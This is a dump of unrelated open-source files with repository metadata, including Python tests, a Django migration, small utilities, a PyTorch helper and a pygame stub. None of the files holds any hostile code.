|
Python
| false | false | 429 |
py
|
import progressbar
def test_with():
    """A context-managed ProgressBar accepts updates without error."""
    with progressbar.ProgressBar(max_value=10) as bar:
        for step in range(10):
            bar.update(step)
def test_with_stdout_redirection():
    """A context-managed bar works with stdout redirection enabled."""
    with progressbar.ProgressBar(max_value=10, redirect_stdout=True) as bar:
        for step in range(10):
            bar.update(step)
def test_with_extra_start():
    """Calling start() repeatedly inside the context manager is harmless."""
    with progressbar.ProgressBar(max_value=10) as bar:
        bar.start()
        bar.start()
|
[
"[email protected]"
] | |
01fd76371431a37e8804b4f2de5e71eb488b3154
|
0e9f73d2ef1239b22e049ef6338362da7dbfb122
|
/source/web/Django/FatQuantsDjango/FatQuantsDjango/ticker/migrations/0097_auto_20190514_2147.py
|
5d4d4dab7faf5ac58c7e11ed8ee2ae65fe9af49c
|
[] |
no_license
|
Andy-Mason/FatQuants
|
3c4bfafc29834af76b0be40e93b0e210e0ef5056
|
edd0e98f4599ef91adbdf4179164769ddd66c62a
|
refs/heads/master
| 2023-01-11T10:57:50.563742 | 2021-08-11T19:04:59 | 2021-08-11T19:04:59 | 73,127,295 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 745 |
py
|
# Generated by Django 2.1.7 on 2019-05-14 20:47
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds the nullable `product_leverage` float
    column and the `unit_type` choice column (Acc/Inc) to the ticker model."""
    dependencies = [
        ('ticker', '0096_auto_20190514_2147'),
    ]
    operations = [
        migrations.AddField(
            model_name='ticker',
            name='product_leverage',
            field=models.FloatField(blank=True, db_column='product_leverage', null=True, verbose_name='Product Leverage'),
        ),
        migrations.AddField(
            model_name='ticker',
            name='unit_type',
            field=models.CharField(blank=True, choices=[('Acc', 'Accumulation'), ('Inc', 'Income')], db_column='unit_type', default='', max_length=3, verbose_name='Unit Type'),
        ),
    ]
|
[
"[email protected]"
] | |
385053382cb462ca295e3ea3ca1df86b6ad1b044
|
99b2aff89dcec2f43cee32a6bdd4c0c43d6c51fa
|
/tests/contract_tests/growl_tdg_garden/test_growl_tdg_garden_pick_intial_id.py
|
1782590265f597e5d879efb03aac96504f4f4d5d
|
[
"MIT"
] |
permissive
|
baking-bad/pytezos
|
c4248bde49a5b05521b8cc51eeca588b1a721660
|
19747e3acec2141f06e812025673f497fc07e2d4
|
refs/heads/master
| 2023-07-06T21:57:09.572985 | 2023-07-05T11:45:27 | 2023-07-05T11:45:27 | 169,243,460 | 115 | 43 |
MIT
| 2023-07-04T16:28:09 | 2019-02-05T13:12:50 |
Python
|
UTF-8
|
Python
| false | false | 1,885 |
py
|
import json
from os.path import dirname
from os.path import join
from unittest import TestCase
from pytezos.michelson.forge import forge_micheline
from pytezos.michelson.forge import unforge_micheline
from pytezos.michelson.program import MichelsonProgram
folder = 'typed_minter'
entrypoint = 'mint_TYPED'
class MainnetOperationTestCaseGROWL_TDG_GARDEN(TestCase):
    """Contract regression tests for the GROWL_TDG_GARDEN mainnet operation,
    replayed against fixture JSON files stored next to this module.

    NOTE(review): the empty ``f''`` path components below are no-ops from the
    test generator — the fixtures are simply read from this file's directory.
    """
    @classmethod
    def setUpClass(cls):
        # Load the contract's Michelson code and the recorded operation.
        with open(join(dirname(__file__), f'', '__script__.json')) as f:
            script = json.loads(f.read())
        cls.program = MichelsonProgram.match(script['code'])
        with open(join(dirname(__file__), f'', f'pick_intial_id.json')) as f:
            operation = json.loads(f.read())
        cls.entrypoint = f'pick_intial_id'
        cls.operation = operation
        # cls.maxDiff = None
    def test_parameters_growl_tdg_garden(self):
        # Parameters must survive a to-Python / to-readable round trip.
        original_params = self.program.parameter.from_parameters(self.operation['parameters'])
        py_obj = original_params.to_python_object()
        # pprint(py_obj)
        readable_params = self.program.parameter.from_parameters(original_params.to_parameters(mode='readable'))
        self.assertEqual(py_obj, readable_params.to_python_object())
        self.program.parameter.from_python_object(py_obj)
    def test_lazy_storage_growl_tdg_garden(self):
        # Merging the recorded lazy-storage diff must not raise.
        storage = self.program.storage.from_micheline_value(self.operation['storage'])
        lazy_storage_diff = self.operation['lazy_storage_diff']
        extended_storage = storage.merge_lazy_diff(lazy_storage_diff)
        py_obj = extended_storage.to_python_object(try_unpack=True, lazy_diff=True)
        # pprint(py_obj)
    def test_parameters_forging(self):
        # Forging then unforging the parameters must be the identity.
        expected = self.operation['parameters'].get('value', {'prim': 'Unit'})
        actual = unforge_micheline(forge_micheline(expected))
        self.assertEqual(expected, actual)
|
[
"[email protected]"
] | |
bfdfc1a62852507f68a014cbcc9ad012b1f7e16e
|
9139bd5dad2c66f070d1eb01958a11a2af1c9835
|
/game-again.py
|
224f4ce078f24c31bd6fed0be854de5fba7b5cf7
|
[] |
no_license
|
anmolrajaroraa/python-reg-oct
|
7223487b864d969e89f9daae2a77522405977f27
|
acb62ad7c8acb78f348bdc47e5ed6230808d967c
|
refs/heads/master
| 2020-08-04T09:10:25.152732 | 2019-11-08T08:57:28 | 2019-11-08T08:57:28 | 212,085,152 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 292 |
py
|
import pygame

pygame.init()

# Window dimensions in pixels.
HEIGHT = 500
WIDTH = 1000

# red green blue (0-255)
BLACK = 0, 0, 0
WHITE = 255, 255, 255
RED = 255, 0, 0
RANDOM_COLOR = 100, 150, 200

gameboard = pygame.display.set_mode((WIDTH, HEIGHT))

# Bug fix: the original loop never processed the event queue (and printed
# "!" forever), so the window appeared frozen and could not be closed.
running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    gameboard.fill(BLACK)
    pygame.display.update()

pygame.quit()
|
[
"[email protected]"
] | |
20ede17c952b40d8bfe9406df93dd193f5dceb68
|
b4ddc954a7dc0d24352de64a567c10c9e7231eee
|
/LeetCode/Pascal_Triangle.py
|
19ffa5bc0886c62656dc9045ad7221ae44c9f5e0
|
[] |
no_license
|
sharadbhat/Competitive-Coding
|
4d80c99093bf05a2213799c95467309cf3e40d07
|
79eec04cc6b1ac69295530bda1575ecb613a769e
|
refs/heads/master
| 2023-07-05T02:25:33.397140 | 2023-06-27T05:38:12 | 2023-06-27T05:38:12 | 78,031,600 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 490 |
py
|
# LeetCode
# https://leetcode.com/problems/pascals-triangle/description/
class Solution(object):
    def generate(self, numRows):
        """Return the first `numRows` rows of Pascal's triangle.

        :type numRows: int
        :rtype: List[List[int]]
        """
        triangle = []
        for row_index in range(numRows):
            if row_index == 0:
                triangle.append([1])
                continue
            prev = triangle[-1]
            # Interior entries are pairwise sums of the previous row.
            row = [1] + [a + b for a, b in zip(prev, prev[1:])] + [1]
            triangle.append(row)
        return triangle
|
[
"[email protected]"
] | |
ba79f0a7a16eee2f5d086bd7d5e06adec8636825
|
f10d45aecbfccb3f469ab0c4ae55fc0f256c9004
|
/Functions/chr_ord.py
|
80c8745e0e21329911e636eedb326846d34957cc
|
[] |
no_license
|
Do-code-ing/Python_Built-ins
|
c34c1cea19a2cef80ab3a16d050e8825af0feb59
|
03b2f277acde4fce00bb521e3a0b8c0469b39879
|
refs/heads/master
| 2023-07-29T15:30:00.693005 | 2021-09-04T18:48:18 | 2021-09-04T18:48:18 | 354,467,767 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 518 |
py
|
# chr(i): return the one-character Unicode string for code point i.
# Raises ValueError when i is outside 0 .. 1,114,111 (0x10FFFF).

# integer -> character
print(chr(8364))
# prints the euro sign

# ord(c): given a one-character Unicode string, return its code point.
# Exact inverse of chr().

# character -> integer
print(ord("โฌ"))
# 8364
|
[
"[email protected]"
] | |
ea0d2d7415c8d98590a6caf8cc4bb1aa659fd24e
|
1457bf059b94e04d4d512012b28a924167c68938
|
/NetworkBehaviour/Basics/Normalization_Sparse.py
|
164188463a9a59cb81bc31b3411633742dab0ba2
|
[] |
no_license
|
YaminaDJOUDI/PymoNNto
|
e063c81547d41a9841ff8f8071c4d6347ce792da
|
807aa7e0ba38cb29ad7839b39f29752da00eee78
|
refs/heads/master
| 2023-07-08T03:06:41.722292 | 2021-08-04T11:30:52 | 2021-08-04T11:30:52 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 850 |
py
|
import numpy as np
import scipy.sparse  # Bug fix: original had a bare `scipy.sparse` expression — a NameError at import time.


def normalize_synapse_attr_sparse(src_attr, target_attr, target_value, neurons, synapse_type):
    """Rescale afferent synaptic weights so each neuron's summed `src_attr`
    weights equal `target_value`.

    Handles both dense numpy matrices and sparse matrices (synapses tagged
    'sparse'), modifying `target_attr` in place for the sparse case.

    :param src_attr: attribute name whose per-row sums define the normaliser
    :param target_attr: attribute name whose values are rescaled
    :param target_value: desired per-neuron total weight
    :param neurons: neuron group providing get_neuron_vec() / afferent_synapses
    :param synapse_type: key into neurons.afferent_synapses
    """
    neurons.temp_weight_sum = neurons.get_neuron_vec()
    for s in neurons.afferent_synapses[synapse_type]:
        if 'sparse' in s.tags:
            # Sparse .sum(1) yields an (n, 1) matrix; flatten to a vector.
            s.dst.temp_weight_sum += np.array(getattr(s, src_attr).sum(1)).flatten()
        else:
            s.dst.temp_weight_sum += np.sum(getattr(s, src_attr), axis=1)
    neurons.temp_weight_sum /= target_value
    for s in neurons.afferent_synapses[synapse_type]:
        if 'sparse' in s.tags:
            # NOTE(review): for CSR matrices `indices` are column indices, so
            # this divides by the source-indexed sums — confirm the intended
            # sparse format (CSC would index rows here).
            W = getattr(s, target_attr)
            W.data /= np.array(neurons.temp_weight_sum[W.indices]).reshape(W.data.shape)
        else:
            # The `==0` term turns zero sums into 1, avoiding division by zero
            # for neurons with no afferent input.
            setattr(s, target_attr, getattr(s, target_attr) / (s.dst.temp_weight_sum[:, None]+(s.dst.temp_weight_sum[:, None]==0)))
|
[
"[email protected]"
] | |
e0af98a161bb2fe76f40a9dab414307691aed916
|
cdecfcc56973ae143f04a9e92225c5fc90a052ab
|
/tracing/tracing/value/diagnostics/reserved_infos.py
|
13aedf28520e992994fa0efa641eba6d7f919036
|
[
"BSD-3-Clause"
] |
permissive
|
eugenesavenko/catapult
|
8e43adab9a4650da4e8e1860f3b9b49936955aae
|
f2ad70de40a8f739438d89b0c8d5ed6509b3cbe6
|
refs/heads/master
| 2021-05-05T17:31:51.483972 | 2017-09-13T15:10:56 | 2017-09-13T15:10:56 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,662 |
py
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class _Info(object):
def __init__(self, name, _type=None, entry_type=None):
self._name = name
self._type = _type
if entry_type is not None and self._type != 'GenericSet':
raise ValueError(
'entry_type should only be specified if _type is GenericSet')
self._entry_type = entry_type
@property
def name(self):
return self._name
@property
def type(self):
return self._type
@property
def entry_type(self):
return self._entry_type
# Registry of reserved diagnostic names. Each entry records the serialized
# name, the diagnostic type, and (for GenericSet diagnostics) the entry type.
ANGLE_REVISIONS = _Info('angleRevisions', 'GenericSet', str)
ARCHITECTURES = _Info('architectures', 'GenericSet', str)
BENCHMARKS = _Info('benchmarks', 'GenericSet', str)
BENCHMARK_START = _Info('benchmarkStart', 'DateRange')
BOTS = _Info('bots', 'GenericSet', str)
BUG_COMPONENTS = _Info('bugComponents', 'GenericSet', str)
BUILDS = _Info('builds', 'GenericSet', int)
CATAPULT_REVISIONS = _Info('catapultRevisions', 'GenericSet', str)
CHROMIUM_COMMIT_POSITIONS = _Info('chromiumCommitPositions', 'GenericSet', int)
CHROMIUM_REVISIONS = _Info('chromiumRevisions', 'GenericSet', str)
GPUS = _Info('gpus', 'GenericSet', str)
GROUPING_PATH = _Info('groupingPath')
LABELS = _Info('labels', 'GenericSet', str)
LOG_URLS = _Info('logUrls', 'GenericSet', str)
MASTERS = _Info('masters', 'GenericSet', str)
MEMORY_AMOUNTS = _Info('memoryAmounts', 'GenericSet', int)
MERGED_FROM = _Info('mergedFrom', 'RelatedHistogramMap')
MERGED_TO = _Info('mergedTo', 'RelatedHistogramMap')
OS_NAMES = _Info('osNames', 'GenericSet', str)
OS_VERSIONS = _Info('osVersions', 'GenericSet', str)
OWNERS = _Info('owners', 'GenericSet', str)
PRODUCT_VERSIONS = _Info('productVersions', 'GenericSet', str)
RELATED_NAMES = _Info('relatedNames', 'GenericSet', str)
SKIA_REVISIONS = _Info('skiaRevisions', 'GenericSet', str)
STORIES = _Info('stories', 'GenericSet', str)
STORYSET_REPEATS = _Info('storysetRepeats', 'GenericSet', int)
STORY_TAGS = _Info('storyTags', 'GenericSet', str)
TAG_MAP = _Info('tagmap', 'TagMap')
TRACE_START = _Info('traceStart', 'DateRange')
TRACE_URLS = _Info('traceUrls', 'GenericSet', str)
# NOTE(review): 'v8CommitPositions' typed as DateRange looks inconsistent with
# CHROMIUM_COMMIT_POSITIONS (GenericSet of int) -- confirm upstream intent.
V8_COMMIT_POSITIONS = _Info('v8CommitPositions', 'DateRange')
V8_REVISIONS = _Info('v8Revisions', 'GenericSet', str)
WEBRTC_REVISIONS = _Info('webrtcRevisions', 'GenericSet', str)
def GetTypeForName(name):
  """Return the diagnostic type registered for *name*, or None if unknown."""
  # Bug fix: dict.itervalues() is Python-2-only; .values() works on 2 and 3.
  for info in globals().values():
    if isinstance(info, _Info) and info.name == name:
      return info.type
  return None
def AllInfos():
  """Yield every _Info instance defined at module scope."""
  # Bug fix: dict.itervalues() is Python-2-only; .values() works on 2 and 3.
  for info in globals().values():
    if isinstance(info, _Info):
      yield info
|
[
"[email protected]"
] | |
286e5a84629ddfa8a87808ef1f9d99445655a7e5
|
7e79ca343d8d3246fc783161673550f6e4ae8896
|
/tests/test_search.py
|
73b1bddf6e9c87215ffb0554d6c68407a13132a2
|
[
"MIT"
] |
permissive
|
interrogator/buzz
|
5ba0907115aa29efc24f016d1345a0371b91350a
|
7627b8ce4a286f65388f0825487441df00055b39
|
refs/heads/master
| 2023-04-02T03:18:01.691139 | 2020-11-19T12:00:21 | 2020-11-19T12:00:21 | 163,623,092 | 42 | 2 |
MIT
| 2023-03-25T00:51:45 | 2018-12-30T22:55:18 |
Python
|
UTF-8
|
Python
| false | false | 2,544 |
py
|
import unittest
from buzz.corpus import Corpus
class TestSearch(unittest.TestCase):
    """Search tests for buzz.Corpus run against the bundled
    tests/testing-parsed fixture corpus."""

    @classmethod
    def setUpClass(cls):
        """Load the corpus once per class: parsing/loading is slow, so the
        parsed and loaded corpora are shared by all tests as class attributes.
        """
        super().setUpClass()
        cls.parsed = Corpus("tests/testing-parsed")
        cls.loaded = cls.parsed.load()
    def test_non_loaded(self):
        # Non-loaded (on-disk) and loaded corpora must give matching results.
        # todo: find out why .equals isn't the same.
        res = self.parsed.depgrep("w/book/ = x/NOUN/")
        lres = self.loaded.depgrep("w/book/ = x/NOUN/")
        self.assertEqual(len(res), 3)
        self.assertTrue(list(res._n) == list(lres._n))
        res = self.parsed.depgrep("l/book/")
        lres = self.loaded.depgrep("l/book/")
        self.assertEqual(len(res), 6)
        self.assertTrue(list(res.index) == list(lres.index))
        self.assertTrue(list(res._n) == list(lres._n))
    def test_bigrams(self):
        # Bigram tables with and without punctuation tokens.
        j = self.loaded.just.words("(?i)jungle")
        self.assertEqual(len(j), 6)
        big = self.loaded.bigrams.depgrep("l/jungle/", from_reference=True).table(
            show=["x"]
        )
        self.assertTrue("punct" in big.columns)
        self.assertEqual(big.shape[1], 5)
        no_punct = self.loaded.skip.wordclass.PUNCT
        big = no_punct.bigrams.lemma("jungle", from_reference=False).table(show=["x"])
        self.assertFalse("punct" in big.columns)
        self.assertEqual(big.shape[1], 3)
    def test_depgrep(self):
        res = self.loaded.depgrep("L/book/")
        self.assertEqual(len(res), 3)
        # Case-insensitive governor queries; p/^N/ matches a superset of x/^NOUN/.
        res = self.loaded.depgrep('x/^NOUN/ -> l"the"', case_sensitive=False)
        sup = self.loaded.depgrep('p/^N/ -> l"the"', case_sensitive=False)
        # sup is a superset of res
        self.assertTrue(all(i in sup.index for i in res.index))
        self.assertEqual(len(sup), 28)
        self.assertEqual(len(res), 24)
        self.assertTrue((res.x == "NOUN").all())
        # let us check this manually
        # get all rows whose lemma is 'the'
        the = self.loaded[self.loaded["l"] == "the"]
        count = 0
        # iterate over rows, get governor of the, lookup this row.
        # if row is a noun, check that its index is in our results
        for (f, s, _), series in the.T.items():
            gov = series["g"]
            gov = self.loaded.loc[f, s, gov]
            if gov.x == "NOUN":
                self.assertTrue(gov.name in res.index)
                count += 1
        self.assertEqual(count, len(res))
|
[
"[email protected]"
] | |
de198265ca023fde36b1896bd7f7a3c4b83a552d
|
d94b6845aeeb412aac6850b70e22628bc84d1d6d
|
/bigg/bigg/torch_ops/tensor_ops.py
|
9f544ab7efd4d3e2c752d63f5d72056f16c23cef
|
[
"CC-BY-4.0",
"Apache-2.0"
] |
permissive
|
ishine/google-research
|
541aea114a68ced68736340e037fc0f8257d1ea2
|
c1ae273841592fce4c993bf35cdd0a6424e73da4
|
refs/heads/master
| 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 |
Apache-2.0
| 2020-06-23T01:55:11 | 2020-02-23T07:59:42 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 3,956 |
py
|
# coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: skip-file
import torch
from torch.nn import Module
from torch.nn.parameter import Parameter
from torch.autograd import Function
import numpy as np
from bigg.common.consts import t_float
class MultiIndexSelectFunc(Function):
    """Autograd op gathering rows from several matrices into one output.

    forward writes mats[i][idx_froms[i]] into out[idx_tos[i]]; an idx_froms[i]
    of None means "copy the whole matrix". backward scatters output-gradient
    rows back to the matching source matrix.
    """
    @staticmethod
    def forward(ctx, idx_froms, idx_tos, *mats):
        assert len(idx_tos) == len(idx_froms) == len(mats)
        cols = mats[0].shape[1]
        # All matrices must be 2-D with the same number of columns.
        assert all([len(x.shape) == 2 for x in mats])
        assert all([x.shape[1] == cols for x in mats])
        num_rows = sum([len(x) for x in idx_tos])
        out = mats[0].new(num_rows, cols)
        for i, mat in enumerate(mats):
            x_from = idx_froms[i]
            x_to = idx_tos[i]
            if x_from is None:
                # Whole-matrix copy into the destination rows.
                out[x_to] = mat.detach()
            else:
                assert len(x_from) == len(x_to)
                out[x_to] = mat[x_from].detach()
        # Save index lists and source shapes for the backward pass.
        ctx.idx_froms = idx_froms
        ctx.idx_tos = idx_tos
        ctx.shapes = [x.shape for x in mats]
        return out
    @staticmethod
    def backward(ctx, grad_output):
        idx_froms, idx_tos = ctx.idx_froms, ctx.idx_tos
        # Leading two Nones: no gradients for the idx_froms/idx_tos arguments.
        list_grad_mats = [None, None]
        for i in range(len(idx_froms)):
            x_from = idx_froms[i]
            x_to = idx_tos[i]
            if x_from is None:
                grad_mat = grad_output[x_to].detach()
            else:
                # Zero gradient everywhere except the selected rows.
                grad_mat = grad_output.new(ctx.shapes[i]).zero_()
                grad_mat[x_from] = grad_output[x_to].detach()
            list_grad_mats.append(grad_mat)
        return tuple(list_grad_mats)
class MultiIndexSelect(Module):
    """nn.Module wrapper around MultiIndexSelectFunc.apply."""
    def forward(self, idx_froms, idx_tos, *mats):
        return MultiIndexSelectFunc.apply(idx_froms, idx_tos, *mats)
# Module-level singleton used as a plain callable.
multi_index_select = MultiIndexSelect()
def test_multi_select():
    """Manual smoke test: gather rows from three matrices, print values
    and the gradients produced by backpropagating their sum."""
    a = Parameter(torch.randn(4, 2))
    b = Parameter(torch.randn(3, 2))
    d = Parameter(torch.randn(5, 2))
    # Rows 0,1 of a -> out rows 4,5; rows 1,2 of b -> 0,1; rows 3,4 of d -> 2,3.
    idx_froms = [[0, 1], [1, 2], [3, 4]]
    idx_tos = [[4, 5], [0, 1], [2, 3]]
    c = multi_index_select(idx_froms, idx_tos, a, b, d)
    print('===a===')
    print(a)
    print('===b===')
    print(b)
    print('===d===')
    print(d)
    print('===c===')
    print(c)
    # Backprop a scalar so each selected row receives gradient 1.
    t = torch.sum(c)
    t.backward()
    print(a.grad)
    print(b.grad)
    print(d.grad)
class PosEncoding(Module):
    """Sinusoidal positional encoding.

    Channel i uses rate base**-((i - i%2)/dim); even channels are shifted by
    `bias`, odd channels by pi/2 + `bias` (turning sin into cos).
    """
    def __init__(self, dim, device, base=10000, bias=0):
        super(PosEncoding, self).__init__()
        rates = [base ** -((i - i % 2) / dim) for i in range(dim)]
        phases = [(np.pi / 2.0 + bias) if i % 2 else bias for i in range(dim)]
        self.device = device
        # Shape (1, dim) so they broadcast against a (n, 1) position column.
        self.sft = torch.tensor(phases, dtype=t_float).view(1, -1).to(device)
        self.base = torch.tensor(rates, dtype=t_float).view(1, -1).to(device)

    def forward(self, pos):
        """Encode positions (list or tensor) into a (n, dim) tensor."""
        with torch.no_grad():
            if isinstance(pos, list):
                pos = torch.tensor(pos, dtype=t_float).to(self.device)
            column = pos.view(-1, 1)
            return torch.sin(column / self.base + self.sft)
if __name__ == '__main__':
    # test_multi_select()
    # Smoke-run the positional encoder on CPU.
    pos_enc = PosEncoding(128, 'cpu')
    print(pos_enc([1, 2, 3]))
|
[
"[email protected]"
] | |
b7b026f7642d82363d9802fe0d817ba66118aad4
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/ec_11022-1357/sdB_EC_11022-1357_lc.py
|
350257c414f2078d50e83da141fccc17f22aa32c
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 351 |
py
|
from gPhoton.gAperture import gAperture
def main():
    # Single gPhoton light-curve extraction for sdB_EC_11022-1357 (NUV band).
    # NOTE(review): the csvfile path contains a space before "/sdB_EC_..." --
    # looks unintended; confirm against the survey's directory layout.
    gAperture(band="NUV", skypos=[166.190667,-14.236356], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_EC_11022-1357 /sdB_EC_11022-1357_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
    main()
|
[
"[email protected]"
] | |
0bd82e74ba3c6621cb7fa14b9f43311bc864df59
|
3a28b1a12d0710c06f6360381ad8be6cf3707907
|
/modular_model/triHPC/triHPCThermo/HPCAllTrays23CstmVapN2.py
|
b31256787ee26b7321199ab3098b7e3d1d66394a
|
[] |
no_license
|
WheatZhang/DynamicModelling
|
6ce1d71d3b55176fd4d77a6aedbaf87e25ce4d02
|
ea099245135fe73e8c9590502b9c8b87768cb165
|
refs/heads/master
| 2020-06-15T14:12:50.373047 | 2019-07-05T01:37:06 | 2019-07-05T01:37:06 | 195,319,788 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 307 |
py
|
def VapN2(P, T, x_N2):
    """Fitted linear surrogate: N2 vapour fraction from pressure,
    temperature and liquid N2 fraction."""
    # Standardize each input: (value - fitting mean) / fitting scale.
    x = (P - 5.50184878e+02) / 3.71707400e-01
    y = (T - -1.77763832e+02) / 1.81029000e-02
    z = (x_N2 - 9.82420040e-01) / 2.44481265e-03
    # Linear model in standardized space (intercept + three slopes).
    score = -8.60567815e-01 + z * 1.86073097e+00 + y * 8.60696199e-01 + x * -4.21414345e-01
    # De-standardize the output back to a vapour fraction.
    return score * 1.31412243e-03 + 9.90969573e-01
|
[
"[email protected]"
] | |
7a09c2d76104f8dd348cfb5c054d8ed6d565d3e1
|
b212ec9d705fb77cac102dceb12eb668099fd1ae
|
/oop/exams/december_2020/tests/project/spaceship/spaceship.py
|
0defe638ec725097b266e2afa6f7fdba3fb197b5
|
[] |
no_license
|
xpucko/Software-University-SoftUni
|
20ef91a0be91a8a09a56d9fdc15888f91409de2f
|
a1fc1781424f025954948299be7f75d317e32dc1
|
refs/heads/master
| 2023-02-04T11:58:33.068431 | 2020-12-24T00:39:11 | 2020-12-24T00:39:11 | 280,227,310 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,052 |
py
|
class Spaceship:
    """A named spaceship with a fixed crew capacity and an astronaut roster."""

    SPACESHIP_FULL = "Spaceship is full"
    ASTRONAUT_EXISTS = "Astronaut {} Exists"
    ASTRONAUT_NOT_FOUND = "Astronaut Not Found"
    ASTRONAUT_ADD = "Added astronaut {}"
    ASTRONAUT_REMOVED = "Removed {}"
    ZERO_CAPACITY = 0

    def __init__(self, name: str, capacity: int):
        self.name = name
        self.capacity = capacity
        self.astronauts = []

    def add(self, astronaut_name: str) -> str:
        """Board an astronaut; raise ValueError when full or already aboard."""
        crew = self.astronauts
        if len(crew) == self.capacity:
            raise ValueError(self.SPACESHIP_FULL)
        if astronaut_name in crew:
            raise ValueError(self.ASTRONAUT_EXISTS.format(astronaut_name))
        crew.append(astronaut_name)
        return self.ASTRONAUT_ADD.format(astronaut_name)

    def remove(self, astronaut_name: str) -> str:
        """Disembark an astronaut; raise ValueError when not aboard."""
        crew = self.astronauts
        if astronaut_name not in crew:
            raise ValueError(self.ASTRONAUT_NOT_FOUND.format(astronaut_name))
        crew.remove(astronaut_name)
        return self.ASTRONAUT_REMOVED.format(astronaut_name)
|
[
"[email protected]"
] | |
a67b3be8bf770a11a0515a42fe9e37b479324764
|
297497957c531d81ba286bc91253fbbb78b4d8be
|
/testing/web-platform/tests/tools/manifest/utils.py
|
5cd53c22e7745bd3656dadd6940aa4d5f33f4f19
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
marco-c/gecko-dev-comments-removed
|
7a9dd34045b07e6b22f0c636c0a836b9e639f9d3
|
61942784fb157763e65608e5a29b3729b0aa66fa
|
refs/heads/master
| 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 |
NOASSERTION
| 2019-09-29T01:27:49 | 2019-09-27T10:44:24 |
C++
|
UTF-8
|
Python
| false | false | 2,232 |
py
|
import os
import subprocess
import sys
from typing import Any, Callable, Generic, Optional, Text, TypeVar
T = TypeVar("T")
def rel_path_to_url(rel_path: Text, url_base: Text = "/") -> Text:
    """Convert a relative filesystem path into a URL rooted at *url_base*."""
    assert not os.path.isabs(rel_path), rel_path
    base = url_base
    if base[0] != "/":
        base = "/" + base
    if base[-1] != "/":
        base = base + "/"
    # URLs always use forward slashes, whatever the host OS separator is.
    return base + rel_path.replace(os.sep, "/")
def from_os_path(path: Text) -> Text:
    """Convert an OS-native path to the /-separated manifest form."""
    assert os.path.sep == "/" or sys.platform == "win32"
    rv = path if "/" == os.path.sep else path.replace(os.path.sep, "/")
    # Backslashes are never legal in manifest paths.
    if "\\" in rv:
        raise ValueError("path contains \\ when separator is %s" % os.path.sep)
    return rv
def to_os_path(path: Text) -> Text:
    """Convert a /-separated manifest path to the OS-native form."""
    assert os.path.sep == "/" or sys.platform == "win32"
    # Manifest paths must already be normalised to forward slashes.
    if "\\" in path:
        raise ValueError("normalised path contains \\")
    return path if "/" == os.path.sep else path.replace("/", os.path.sep)
def git(path: Text) -> Optional[Callable[..., Text]]:
    """Return a callable that runs `git <cmd> ...` in *path*, or None when
    *path* is not inside a git checkout (or git cannot be run)."""
    def gitfunc(cmd: Text, *args: Text) -> Text:
        full_cmd = ["git", cmd] + list(args)
        try:
            return subprocess.check_output(full_cmd, cwd=path, stderr=subprocess.STDOUT).decode('utf8')
        except Exception as e:
            # On Windows git may only be reachable through the git.bat shim.
            # The platform guard short-circuits so the WindowsError name is
            # never evaluated on platforms where it does not exist.
            if sys.platform == "win32" and isinstance(e, WindowsError):
                full_cmd[0] = "git.bat"
                return subprocess.check_output(full_cmd, cwd=path, stderr=subprocess.STDOUT).decode('utf8')
            else:
                raise
    try:
        # Probe: succeeds only when *path* is inside a working tree.
        gitfunc("rev-parse", "--show-toplevel")
    except (subprocess.CalledProcessError, OSError):
        return None
    else:
        return gitfunc
class cached_property(Generic[T]):
    """Descriptor caching the wrapped method's result on the instance.

    The first access computes the value and stores it in the instance
    __dict__ under the same name, shadowing the descriptor, so __get__
    runs at most once per instance. Cached names are recorded in
    __cached_properties__ for later invalidation.
    """
    def __init__(self, func: Callable[[Any], T]) -> None:
        self.func = func
        self.__doc__ = getattr(func, "__doc__")
        self.name = func.__name__
    def __get__(self, obj: Any, cls: Optional[type] = None) -> T:
        if obj is None:
            # Class-level access returns the descriptor itself.
            return self
        # Can only fire once: afterwards the instance attribute shadows us.
        assert self.name not in obj.__dict__
        rv = obj.__dict__[self.name] = self.func(obj)
        obj.__dict__.setdefault("__cached_properties__", set()).add(self.name)
        return rv
|
[
"[email protected]"
] | |
c10025495e49e178e839ee495b8d2b7559ca3fc4
|
6b16458a0c80613a66c251511462e7a7d440970e
|
/packages/pyright-internal/src/tests/samples/variadicTypeVar5.py
|
8089b00a89ef9b4f7adfc12be8efb3939e34e3d4
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
ikamensh/pyright
|
